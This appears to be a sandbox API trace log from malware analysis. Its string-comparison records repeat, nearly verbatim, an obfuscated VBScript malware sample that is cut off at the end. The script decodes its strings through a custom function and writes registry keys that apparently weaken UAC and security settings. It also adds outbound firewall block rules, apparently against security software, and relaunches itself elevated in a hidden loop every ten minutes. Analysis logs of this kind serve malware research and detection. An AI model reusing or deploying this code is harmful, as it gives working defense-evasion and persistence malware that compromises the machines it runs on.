bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 71 [0222.982] wcsncmp (_String1="OCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 66 [0222.982] wcsncmp (_String1="COL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 54 [0222.982] wcsncmp (_String1="OL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 66 [0222.982] wcsncmp (_String1="L_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 63 [0222.983] wcsncmp (_String1="_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite 